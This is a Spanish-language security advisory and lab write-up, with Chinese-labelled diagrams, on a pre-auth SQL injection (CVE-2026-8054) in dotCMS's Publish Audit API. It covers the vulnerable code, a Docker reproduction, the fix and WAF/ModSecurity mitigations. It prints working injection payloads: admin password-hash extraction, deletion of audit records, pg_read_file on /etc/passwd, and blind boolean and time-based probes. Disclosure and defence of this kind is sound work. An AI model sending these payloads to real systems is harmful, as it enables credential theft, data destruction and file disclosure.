
dotCMS Inyección SQL Pre-auth
CVE-2026-8054 es una vulnerabilidad crítica de inyección SQL sin autenticación previa (Pre-auth SQL Injection) que existe en la API de Auditoría de Publicación (Publish Audit API) de dotCMS Core. Esta vulnerabilidad es rastreada oficialmente como incidente de seguridad SI-75 y fue oficialmente reportada y divulgada a finales de mayo de 2026. Debido a que un atacante puede activarla de forma remota sin necesidad de ningún permiso de cuenta, su daño potencial es muy grave.
| Propiedad | Valor |
|---|
| CVE | CVE-2026-8054 |
| Seguimiento oficial | SI-75 |
| Tipo de vulnerabilidad | Inyección SQL (CWE-89) |
| Componente afectado | dotCMS Core - Publish Audit API |
| Puntuación CVSS | 10.0 (Critical) |
| Versiones afectadas | 25.11.04-1 a 26.04.28-02 |
| Versión corregida | 26.04.28-03 |
| Vector de ataque | Inyección SQL remota sin autenticación (Pre-auth) |
| Privilegios requeridos | Ninguno |
| Interacción del usuario | Ninguna |
| Impacto en versiones LTS | No afectadas (la rama de código de auditoría no se retroportó al árbol LTS) |
La vulnerabilidad existe en los puntos finales REST /api/auditPublishing/get y /api/auditPublishing/getAll. Estos puntos finales, al recibir los parámetros de solicitud del cliente, no realizan ningún filtrado ni enlace de parámetros, sino que construyen dinámicamente sentencias SQL mediante concatenación directa de cadenas.
Aún más grave, dotCMS omitó por completo la verificación de autenticación y autorización en estos puntos finales sensibles relacionados con la auditoría. Esto significa que cualquier atacante remoto sin credenciales en la red externa, con solo poder acceder a la red del sistema, puede enviar directamente solicitudes HTTP con payloads maliciosos a estos puntos finales.
Ruta del archivo: dotCMS/src/main/java/com/dotcms/rest/AuditPublishingResource.java
La vulnerabilidad existe en dos puntos finales de la API REST:
GET /api/auditPublishing/get/{bundleId} - Obtiene el estado de auditoría de una publicación individualPOST /api/auditPublishing/getAll - Obtiene el estado de auditoría de múltiples publicacionesProblema clave: Antes de la corrección, estos puntos finales no requerían ninguna autenticación, cualquier usuario anónimo podía acceder directamente.
@Path("/auditPublishing")
@Tag(name = "Publishing")
public class AuditPublishingResource {
@POST
@Path("/getAll")
@Produces(MediaType.APPLICATION_JSON)
public Response getAll(List<String> bundleIds) {
// 【Punto vulnerable】¡Sin verificación de autenticación! Llama directamente a la API del backend
try {
final List<PublishAuditStatus> statuses = auditAPI.getPublishAuditStatuses(bundleIds);
// ...
}
}
}
Ruta del archivo: dotCMS/src/main/java/com/dotcms/publisher/business/PublishAuditAPIImpl.java
Método: getPublishAuditStatuses(List<String> bundleIds) (líneas 224-245)
@CloseDBIfOpened
public List<PublishAuditStatus> getPublishAuditStatuses(List<String> bundleIds)
throws DotPublisherException {
try {
final List<PublishAuditStatus> result = new ArrayList<>();
DotConnect dc = new DotConnect();
// 【Punto vulnerable 1】Concatena directamente la entrada del usuario a la sentencia SQL
// Solo envuelve con comillas simples, sin ninguna parametrización o escape
final List<String> parameter = bundleIds.stream()
.map(id -> "'" + id + "'") // Peligroso: concatenación de cadenas
.collect(Collectors.toList());
// 【Punto vulnerable 2】Usa String.format para construir SQL, la entrada del usuario se incrusta directamente
dc.setSQL(String.format(SELECT_ALL_BY_BUNDLES_IDS,
String.join(",", parameter)));
List<Map<String, Object>> items = dc.loadObjectResults();
for(Map<String, Object> item: items) {
result.add(turnIntoPublishAuditStatus(NO_LIMIT_ASSETS, item));
}
return result;
} catch(Exception e) {
Logger.debug(PublisherUtil.class, e.getMessage(), e);
throw new DotPublisherException("Unable to get list of elements with error:" + e.getMessage(), e);
}
}
Constante SQL (SELECT_ALL_BY_BUNDLES_IDS):
SELECT * FROM publishing_queue_audit WHERE bundle_id IN (%s)
graph LR
subgraph 外部攻击者
A[远程攻击者] -->|发送恶意payload| B[HTTP REST API]
end
subgraph Application Layer
B -->|POST /api/auditPublishing/getAll| C[AuditPublishingResource<br/>GET/POST]
C -->|调用| D[PublishAuditAPI]
D -->|调用| E[PublishAuditAPIImpl]
E -->|传递bundleIds| F[污点处理<br/>bundleIds.stream<br/>.map id -> id]
F -->|拼接参数| G[SQL构造<br/>String.format]
end
subgraph Technology Layer
G -->|构造SQL| H[动态SQL查询<br/>SELECT * FROM publishing_queue_audit<br/>WHERE bundle_id IN %s]
H -->|执行| I[SQL执行]
I -->|执行注入SQL| J[PostgreSQL/MySQL]
end
subgraph 漏洞点
K[漏洞点1<br/>无认证检查] -.->|跳过认证| C
L[漏洞点2<br/>无参数化绑定] -.->|仅添加引号| F
end
style A fill:#ff6b6b,stroke:#333,color:#fff
style K fill:#ff6b6b,stroke:#333,color:#fff
style L fill:#ff6b6b,stroke:#333,color:#fff
style J fill:#ffa94d,stroke:#333Propagación del flujo sucio: Entrada del usuario → API REST → Procesamiento del backend → Construcción SQL → Ejecución en la base de datos Defectos clave: Sin autenticación + Sin parametrización = Inyección SQL completamente controlable
Supongamos que la entrada del usuario es bundleIds = ["x' OR '1'='1"]
SQL normal:
SELECT * FROM publishing_queue_audit WHERE bundle_id IN ('normal-id')
SQL después de la inyección:
SELECT * FROM publishing_queue_audit WHERE bundle_id IN ('x' OR '1'='1')
Dado que '1'='1' siempre es verdadero, esta consulta devolverá todos los registros de la tabla.
graph TD
subgraph 输入对比
A[正常输入<br/>bundle-123] -->|构造| B[正常SQL<br/>WHERE bundle_id IN<br/>'bundle-123']
C[恶意输入<br/>x OR 1=1] -->|注入| D[注入SQL<br/>WHERE bundle_id IN<br/>x OR 1=1]
end
subgraph 数据库执行
B -->|执行| E[数据库]
D -->|执行| E
end
subgraph 结果对比
E -->|返回| F[正常结果<br/>1条记录]
E -->|返回 数据泄露| G[泄露结果<br/>所有记录]
end
style C fill:#ff6b6b,stroke:#333,color:#fff
style G fill:#ff6b6b,stroke:#333,color:#fff
style D fill:#ff6b6b,stroke:#333,color:#fff
note1[注入点: 单引号闭合原有字符串<br/>OR 1=1 使条件永远为真<br/>结果: 返回所有记录]Un atacante que explote con éxito esta vulnerabilidad puede ejecutar comandos SQL arbitrarios en el contexto del usuario del sistema de base de datos, lo que lleva a las siguientes consecuencias graves:
graph TD
subgraph 攻击影响分析
subgraph 数据机密性
A[管理员密码哈希]
B[用户凭证]
C[重置Token]
D[系统配置]
end
subgraph 数据完整性
E[网站内容]
F[用户角色权限]
G[审计日志]
end
subgraph 系统可用性
H[DROP TABLE]
I[DELETE数据]
J[UPDATE数据]
end
subgraph 权限提升
K[管理员接管]
L[文件系统读写]
M[远程代码执行]
end
end
N[SQL注入漏洞] -->|泄露| A
N -->|泄露| B
N -->|泄露| C
N -->|篡改| E
N -->|篡改| F
N -->|执行| H
N -->|实现| K
N -->|实现| L
O[CVSS 10.0 Critical] -.->|评估| N
style N fill:#ff6b6b,stroke:#333,color:#fff
style O fill:#ff6b6b,stroke:#333,color:#fffEl atacante puede extraer tablas de la base de datos principal mediante inyección SQL, obteniendo:
Payload de ataque de ejemplo – Obtener contraseña de administrador:
POST /api/auditPublishing/getAll HTTP/1.1
Host: target:8080
Content-Type: application/json
["x' UNION SELECT user_id,password_hash,email,null,null FROM dotcms_user--"]
El atacante puede modificar, insertar o eliminar arbitrariamente datos en la base de datos:
Payload de ataque de ejemplo – Eliminar registros de auditoría:
POST /api/auditPublishing/getAll HTTP/1.1
Host: target:8080
Content-Type: application/json
["x'; DELETE FROM publishing_queue_audit; --"]
Dependiendo del tipo de base de datos conectada en el backend (PostgreSQL, MySQL, etc.) y los permisos de configuración, el atacante podría aprovechar el punto de inyección para lograr:
Payload de ataque de ejemplo – Lectura de archivos en PostgreSQL:
POST /api/auditPublishing/getAll HTTP/1.1
Host: target:8080
Content-Type: application/json
["x' UNION SELECT null,pg_read_file('/etc/passwd'),null,null,null--"]
| Dimensión | Evaluación |
|---|---|
| Vector de ataque | Red remota (Network) |
| Complejidad del ataque | Baja (Low) |
| Condición previa | Ninguna (None) |
| Interacción del usuario | Ninguna (None) |
| Alcance del impacto | Cambiado (Changed) |
| Impacto en la confidencialidad | Alto (High) |
| Impacto en la integridad | Alto (High) |
| Impacto en la disponibilidad | Alto (High) |
graph TB
subgraph Docker环境架构
subgraph docker-compose
A[dotcms-vuln<br/>dotcms:25.11.04-1]
B[dotcms-db<br/>postgres:15]
C[dotcms-es<br/>elasticsearch:7.17]
end
D[dotcms-net<br/>bridge网络]
E[HTTP :8080]
F[HTTPS :8443]
G[PostgreSQL :5432]
H[Elasticsearch :9200]
end
A -->|暴露| E
A -->|暴露| F
B -->|暴露| G
C -->|暴露| H
A -->|连接数据库| B
A -->|连接搜索引擎| C
D --- A
D --- B
D --- C
style A fill:#51cf66,stroke:#333
style B fill:#51cf66,stroke:#333
style C fill:#51cf66,stroke:#333
note1[漏洞版本: 25.11.04-1<br/>初始密码: admin<br/>端口: 8080, 8443]Usa Docker Compose para montar el entorno vulnerable:
docker-compose.yml:
services:
dotcms:
build: .
container_name: dotcms-vuln
ports:
- "8080:8080"
- "8443:8443"
environment:
- DOT_INITIAL_ADMIN_PASSWORD=admin
- DOT_DOTCMS_URL=http://localhost:8080
- DOT_DB_HOST=dotcms-db
- DOT_DB_PORT=5432
- DOT_DB_NAME=dotcms
- DOT_DB_USERNAME=dotcms
- DOT_DB_PASSWORD=dotcms
- DOT_DB_BASE_URL=jdbc:postgresql://dotcms-db:5432/dotcms
- DOT_DB_DRIVER=org.postgresql.Driver
- DOT_ES_ENDPOINTS=http://dotcms-es:9200
- DOT_ES_HOSTNAME=dotcms-es
depends_on:
dotcms-db:
condition: service_healthy
dotcms-es:
condition: service_started
dotcms-db:
image: postgres:15
environment:
- POSTGRES_DB=dotcms
- POSTGRES_USER=dotcms
- POSTGRES_PASSWORD=dotcms
healthcheck:
test: ["CMD-SHELL", "pg_isready -U dotcms"]
interval: 5s
timeout: 5s
retries: 20
dotcms-es:
image: elasticsearch:7.17.24
environment:
- discovery.type=single-node
- xpack.security.enabled=false
- "ES_JAVA_OPTS=-Xms512m -Xmx512m"
Dockerfile:
FROM dotcms/dotcms:25.11.04-1
Comando de inicio:
docker compose up -d
# Espera a que dotCMS se inicialice (aproximadamente 2-3 minutos)
# Verifica el estado: docker compose logs -f dotcms
POST /api/auditPublishing/getAll HTTP/1.1
Host: localhost:8080
Content-Type: application/json
Content-Length: 11
["test-id"]
Respuesta: 200 OK, devuelve un array vacío [], lo que demuestra que el punto final es accesible sin autenticación.
Principio de la inyección ciega booleana: se determina si una condición es verdadera o falsa observando la diferencia en los códigos de estado de la respuesta HTTP.
graph TD
subgraph 布尔盲注流程
A["发送请求"] -->|发送payload| B["/api/auditPublishing/getAll"]
B -->|真条件| C["真条件 and 1=1"]
B -->|假条件| D["假条件 and 1=2"]
C -->|返回数据| E["404 Not Found 有数据 NPE"]
D -->|不返回数据| F["200 OK + 空数组 无数据正常"]
E -->|分析| G["分析响应"]
F -->|分析| G
G -->|推断条件真假| H["结论推断"]
end
style C fill:#51cf66,stroke:#333
style D fill:#ff6b6b,stroke:#333,color:#fff
style E fill:#ff6b6b,stroke:#333,color:#fff
style F fill:#51cf66,stroke:#333
note1["Payload: real-bundle-1 and 1=1 响应: 404 NPE异常 结论: 条件为真"]
note2["Payload: real-bundle-1 and 1=2 响应: 200 + 空数组 结论: 条件为假"]Prueba de condición verdadera (and 1=1):
POST /api/auditPublishing/getAll HTTP/1.1
Host: localhost:8080
Content-Type: application/json
["real-bundle-1') and 1=1--'"]
Respuesta: 404 Not Found
Prueba de condición falsa (and 1=2):
POST /api/auditPublishing/getAll HTTP/1.1
Host: localhost:8080
Content-Type: application/json
["real-bundle-1') and 1=2--'"]
Respuesta: 200 OK, devuelve []
Análisis de la ejecución SQL:
-- Condición verdadera: bundle_id coincide y 1=1 es verdadero -> devuelve datos -> el código maneja NPE -> 404
select * from publishing_queue_audit where bundle_id in ('real-bundle-1') and 1=1--'')
-- Condición falsa: bundle_id coincide pero 1=2 es falso -> no devuelve datos -> resultado vacío manejado normalmente -> 200
select * from publishing_queue_audit where bundle_id in ('real-bundle-1') and 1=2--'')
Principio de la diferencia en la respuesta:
| Condición | Resultado SQL | Comportamiento del código | Respuesta HTTP |
|---|---|---|---|
and 1=1 (verdadero) | Devuelve registros coincidentes | turnIntoPublishAuditStatus() lanza NullPointerException al procesar datos | 404 |
and 1=2 (falso) | No devuelve registros | Lista vacía devuelta normalmente | 200 + [] |
Conclusión: Mediante la diferencia entre respuestas 404/200, el atacante puede inferir bit a bit cualquier información de la base de datos (nombres de tablas, valores de campos, hashes de contraseñas, etc.).
Principio de la inyección ciega basada en tiempo: se determina si una condición es verdadera o falsa observando la diferencia en el tiempo de respuesta.
graph TD
subgraph 时间盲注流程
A["发送请求"] -->|发送payload| B["/api/auditPublishing/getAll"]
B -->|传递| C["延时Payload SELECT pg_sleep N"]
C -->|执行SQL| D["PostgreSQL"]
D -->|调用| E["pg_sleep N 延时执行"]
E -->|延时N秒| F["测量响应时间"]
F -->|对比基线| G["分析延时差异"]
G -->|推断条件真假| H["结论推断"]
end
style C fill:#51cf66,stroke:#333
style E fill:#51cf66,stroke:#333
note1["Payload: x and SELECT pg_sleep 3 text=t 正常响应: 0.03秒 延时响应: 3.02秒 结论: pg_sleep执行成功"]Prueba con retardo de 3 segundos:
POST /api/auditPublishing/getAll HTTP/1.1
Host: localhost:8080
Content-Type: application/json
["x') and (SELECT pg_sleep(3))::text='t'--'"]

Respuesta: 200 OK, tiempo 3.02 segundos
Prueba con retardo de 5 segundos:
POST /api/auditPublishing/getAll HTTP/1.1
Host: localhost:8080
Content-Type: application/json
["x') and (SELECT pg_sleep(5))::text='t'--'"]
Respuesta: 200 OK, tiempo 5.01 segundos
Análisis de la ejecución SQL:
select * from publishing_queue_audit where bundle_id in ('x') and (SELECT pg_sleep(3))::text='t'--'')
Comparación de tiempos de respuesta:
| Payload | Retardo esperado | Tiempo real | Resultado |
|---|---|---|---|
| Solicitud normal | 0 segundos | 0.03 segundos | ✅ |
| pg_sleep(3) | 3 segundos | 3.02 segundos | ✅ Retardo exitoso |
| pg_sleep(5) | 5 segundos | 5.01 segundos | ✅ Retardo exitoso |
Conclusión: controlando el retardo en la respuesta, el atacante puede inferir bit a bit información de la base de datos incluso en escenarios sin salida visible.
graph TD
subgraph 修复方案
subgraph 代码修复
A[参数化查询<br/>使用占位符]
B[认证增强<br/>Push Publish Token]
C[输入验证<br/>null/空检查]
end
subgraph 修复效果
D[防止SQL注入]
E[限制未授权访问]
F[防止空指针异常]
end
G[PR #35553]
H[修复版本<br/>26.04.28-03]
end
G -->|实现| A
G -->|实现| B
G -->|实现| C
A -->|参数绑定| D
B -->|强制认证| E
C -->|空值处理| F
H -->|包含| G
style G fill:#51cf66,stroke:#333
style H fill:#51cf66,stroke:#333
note1[修复前: String.format拼接<br/>修复后: dc.addParam参数绑定]Antes de la corrección (código vulnerable):
final List<String> parameter = bundleIds.stream()
.map(id -> "'" + id + "'")
.collect(Collectors.toList());
dc.setSQL(String.format(SELECT_ALL_BY_BUNDLES_IDS, String.join(",", parameter)));
Después de la corrección (código seguro):
// Nuevo: verificación de valores nulos
if (bundleIds == null || bundleIds.isEmpty()) {
return Collections.emptyList();
}
// Uso de marcadores de posición para consultas parametrizadas
final String placeholders = bundleIds.stream()
.map(id -> "?")
.collect(Collectors.joining(","));
dc.setSQL(String.format(SELECT_ALL_BY_BUNDLES_IDS, placeholders));
bundleIds.forEach(dc::addParam); // Enlace de parámetros, previene la inyección SQL
Antes de la corrección:
public Response getAll(List<String> bundleIds) {
// Sin verificación de autenticación
try {
final List<PublishAuditStatus> statuses = auditAPI.getPublishAuditStatuses(bundleIds);
Después de la corrección:
public Response getAll(final List<String> bundleIds,
@Context final HttpServletRequest request) {
// Nuevo: verificación del token de autenticación Push Publish
final AuthCredentialPushPublishUtil.PushPublishAuthenticationToken ppAuthToken =
AuthCredentialPushPublishUtil.INSTANCE.processAuthHeader(request);
final Optional<Response> failResponse = PushPublishResourceUtil.getFailResponse(request, ppAuthToken);
if (failResponse.isPresent()) {
return failResponse.get(); // Devuelve 401 Unauthorized
}
// ...
}
| Medida de corrección | Descripción |
|---|---|
| Consulta parametrizada | Uso de marcadores de posición ? en lugar de concatenación de cadenas; la base de datos maneja automáticamente el escape de parámetros, previniendo fundamentalmente la inyección SQL |
| Mejora de autenticación | Exigir que la solicitud lleve un token Push Publish válido, restringiendo el acceso solo a usuarios autenticados con permisos en el componente publishing-queue |
| Verificación de entrada | Añadir comprobaciones de null y listas vacías para evitar excepciones de puntero nulo |
Si no es posible actualizar inmediatamente a la versión corregida, se pueden tomar las siguientes medidas de mitigación temporal:
graph TD
subgraph 防护措施
subgraph 网络层
A[WAF规则拦截<br/>阻止/api/auditPublishing/]
B[防火墙限制<br/>仅允许内网访问]
end
subgraph 应用层
C[Nginx防护规则<br/>location拦截]
D[ModSecurity规则<br/>SQL注入检测]
end
subgraph 数据层
E[数据库权限限制<br/>最小权限原则]
F[限制高危函数<br/>pg_read_file等]
end
G[升级到26.04.28-03<br/>根本解决方案]
end
A -.->|临时替代| G
B -.->|临时替代| G
C -.->|临时替代| G
E -.->|降低影响| G
style G fill:#51cf66,stroke:#333
style A fill:#ffd43b,stroke:#333
style B fill:#ffd43b,stroke:#333
style C fill:#ffd43b,stroke:#333
style D fill:#ffd43b,stroke:#333
note1[优先级: P0 - 立即升级<br/>其他措施为临时缓解方案]Configura políticas de control de acceso en el firewall de aplicaciones web (WAF) o proxy inverso para bloquear o denegar directamente las solicitudes externas a las rutas /api/auditPublishing/get y /api/auditPublishing/getAll.
# /etc/nginx/conf.d/dotcms-security.conf
# Bloquear solicitudes a la API de auditoría de publicación
location ~ ^/api/auditPublishing/(get|getAll) {
# Devolver 403 prohibido
return 403 "Forbidden: Endpoint blocked for security reasons";
add_header Content-Type text/plain;
}
# O usar un enfoque más permisivo, solo permitir acceso desde la red interna
location ~ ^/api/auditPublishing/(get|getAll) {
# Permitir rangos de IP internas
allow 10.0.0.0/8;
allow 172.16.0.0/12;
allow 192.168.0.0/16;
# Denegar todos los demás orígenes
deny all;
}
# Reglas WAF para características de inyección SQL
location / {
# Detectar características comunes de inyección SQL
if ($request_uri ~* "(union|select|insert|update|delete|drop|--)") {
return 403;
}
# Detectar inyección de comillas simples
if ($request_uri ~* "'") {
return 403;
}
proxy_pass http://dotcms_backend;
}
# /etc/modsecurity/rules/dotcms-cve-2026-8054.conf
# Regla 1: Bloquear acceso a los puntos finales vulnerables
SecRule REQUEST_URI "@rx /api/auditPublishing/(get|getAll)" \
"id:2026805401,phase:1,deny,status:403,msg:'CVE-2026-8054: Blocked access to vulnerable dotCMS endpoint'"
# Regla 2: Detectar características de inyección SQL
SecRule REQUEST_BODY "@rx (?i:(union|select|insert|update|delete|drop|exec|--)".*?(from|into|table))" \
"id:2026805402,phase:2,deny,status:403,msg:'CVE-2026-8054: SQL Injection attempt detected'"
Asegúrate de que la cuenta que utiliza dotCMS para conectar a la base de datos siga el principio de mínimo privilegio:
-- Ejemplo de restricción de permisos en PostgreSQL
-- Crear usuario restringido
CREATE USER dotcms_restricted WITH PASSWORD 'secure_password';
-- Conceder solo permisos necesarios en tablas
GRANT SELECT, INSERT, UPDATE, DELETE ON ALL TABLES IN SCHEMA public TO dotcms_restricted;
-- Prohibir crear/eliminar tablas
REVOKE CREATE ON SCHEMA public FROM dotcms_restricted;
-- Prohibir ejecutar comandos del sistema
REVOKE ALL ON FUNCTION pg_exec FROM dotcms_restricted;
-- Prohibir leer archivos
REVOKE ALL ON FUNCTION pg_read_file FROM dotcms_restricted;
# Usar iptables para restringir el acceso al puerto de la API
# Solo permitir acceso a la red interna al puerto 8080
iptables -A INPUT -p tcp --dport 8080 -s 10.0.0.0/8 -j ACCEPT
iptables -A INPUT -p tcp --dport 8080 -s 172.16.0.0/12 -j ACCEPT
iptables -A INPUT -p tcp --dport 8080 -s 192.168.0.0/16 -j ACCEPT
iptables -A INPUT -p tcp --dport 8080 -j DROP
graph TD
subgraph 漏洞总结
subgraph 根因分析
A[缺乏输入验证<br/>用户输入直接拼接SQL]
B[缺乏认证<br/>API无需认证即可访问]
C[缺乏参数化<br/>字符串拼接而非参数查询]
end
subgraph CVSS评估
D[CVSS 10.0<br/>Critical]
E[网络远程]
F[低复杂度]
G[无需认证]
end
subgraph 修复建议
H[P0: 立即升级<br/>26.04.28-03]
I[P1: WAF拦截<br/>临时缓解]
J[P2: 数据库权限<br/>降低影响]
end
end
A -->|导致| D
B -->|导致| D
C -->|导致| D
H -->|解决| A
H -->|解决| B
H -->|解决| C
I -.->|临时替代| H
J -.->|降低风险| H
style D fill:#ff6b6b,stroke:#333,color:#fff
style H fill:#51cf66,stroke:#333
note1[攻击向量: Network<br/>攻击复杂度: Low<br/>权限要求: None<br/>用户交互: None]
| Prioridad | Medida | Descripción |
|---|---|---|
| P0 - Inmediata | Actualizar a dotCMS 26.04.28-03 o superior | Versión oficial corregida, soluciona el problema de raíz |
| P1 - Urgente | Configurar reglas WAF para bloquear | Medida de mitigación temporal, bloquea el tráfico de ataque |
| P2 - Importante | Restringir permisos de la base de datos | Reduce el alcance del impacto en caso de explotación |
| P3 - Recomendado | Auditoría de seguridad de otros puntos finales | Verificar si existen problemas similares |
Oficialmente, las versiones LTS (soporte a largo plazo) no se ven afectadas, porque la rama de código de auditoría afectada nunca fue retroportada (Backported) al árbol LTS. Los usuarios de versiones LTS no necesitan una actualización urgente.
Fecha de generación del informe: 2026-06-08 Herramientas de análisis: Docker, curl, PostgreSQL Versión vulnerable: dotCMS 25.11.04-1 Versión corregida: dotCMS 26.04.28-03 (PR #35553)